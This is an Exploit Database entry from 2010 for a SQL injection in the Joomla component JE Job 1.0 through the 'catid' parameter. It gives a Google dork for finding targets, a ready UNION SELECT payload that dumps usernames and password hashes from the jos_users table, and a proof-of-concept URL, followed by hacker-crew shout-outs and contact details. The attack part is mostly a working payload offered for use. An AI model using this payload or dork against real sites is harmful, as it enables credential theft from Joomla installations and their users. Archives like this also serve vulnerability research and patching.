Joomla! Component JE Job 1.0 – ‘catid’ SQL Injection

• Exploit Database
• 12 阅读

• 作者： v3n0m
  日期： 2010-05-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12782/

•  ) )) ( ( ( (( ) ) 
  ( /(( /( ( ( /(( (( )\ ))\ ))\ ))\ ) )\ ) ( /(( /( 
  )\())\()))\ ))\()) )\)\ )\ (()/(()/(((()/(()/((()/( )\()) )\())
   ((_)((_)\(()/( ((_)((((_)((((_)(((_)(/(_))(_)) )\/(_))(_))/(_))(_)\|((_)\ 
  __ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))_((_)_ ((_)
  \ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ ||_ _|| \| | |/ / 
   \ V / (_) || (_ |\ V / / _ \| (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <
  |_| \___/\___| |_| /_/ \_\\___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
  										.WEB.ID
  -----------------------------------------------------------------------
  Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability
  -----------------------------------------------------------------------
  Author	: v3n0m
  Site	: http://yogyacarderlink.web.id/
  Date		: May, 29-2010
  Location	: Jakarta, Indonesia
  Time Zone	: GMT +7:00
  ----------------------------------------------------------------
  
  Affected software description:
  ~~~~~~~~~~~~~~~~~~~~~~~~~~
   
  Application : JE Job
  Vendor: http://joomlaextensions.co.in/
  License : GPLv2
  Version : 1.0 Lower versions may also be affected
  Google Dork : inurl:com_jejob
   
  User can search the job by Location or by Job Title or by Experience. User can 
  also see the job category at the front page. Category wise jobs are displayed in it.
  ----------------------------------------------------------------
  
  Exploitz:
  ~~~~~~~
  -9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5+from+jos_users--
  
  
  SQLi p0c:
  ~~~~~~~
  
  http://127.0.0.1/[path]/index.php?option=com_jejob&view=item&catid=[SQLi]
  ----------------------------------------------------------------
  
  Shoutz:
  ~~~~
  
  - 'malingsial banyak cakap, you skill off bullshit on '
  - LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
  - setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
  - kiddies,whitehat,mywisdom,yadoy666,udhit
  - c4uR (besok² klo curhat jangan nangis lagi ah uR bruakakaka)
  - BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
  - elicha cristia [ Mizz U so much... ]
  - Joss [at] hack0wn.com
  - #yogyacarderlink @irc.dal.net
  ----------------------------------------------------------------
  Contact:
  ~~~~
  
  v3n0m | YOGYACARDERLINK CREW | v3n0m666[at]live[live]com
  Homepage: http://yogyacarderlink.web.id/
  	http://v3n0m.blogdetik.com/
  	http://elich4.blogspot.com/ << Update donk >_<
  
  ---------------------------[EOF]--------------------------------